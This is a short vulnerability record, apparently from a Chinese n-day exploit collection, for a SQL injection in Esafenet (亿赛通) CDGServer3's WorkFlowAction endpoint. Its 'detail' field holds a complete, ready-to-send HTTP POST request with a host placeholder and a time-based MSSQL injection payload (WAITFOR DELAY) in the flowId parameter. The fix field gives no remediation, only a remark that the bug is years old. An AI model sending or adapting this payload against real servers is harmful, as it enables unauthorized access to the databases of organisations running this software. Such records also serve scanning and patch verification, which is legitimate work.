vendor = "绿盟"
name = "亿赛通 WorkFlowAction SQL 注入"
type = "SQL注入"
version = "未知"
path = "/CDGServer3/3g/WorkFlowAction;Servicelogin"
detail = "POST /CDGServer3/3g/WorkFlowAction;Servicelogin HTTP/1.1 Host: {{Hostname}} Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 command=Approval&userId=1&fromurl=getTodoList.jsp?curpage=111&flowId=111'%3bWAITFOR+DELAY+'0%3a0%3a4'--"
fix = "n年老洞"
date = "0703"
label = "nday"
verifier = "AdySec"
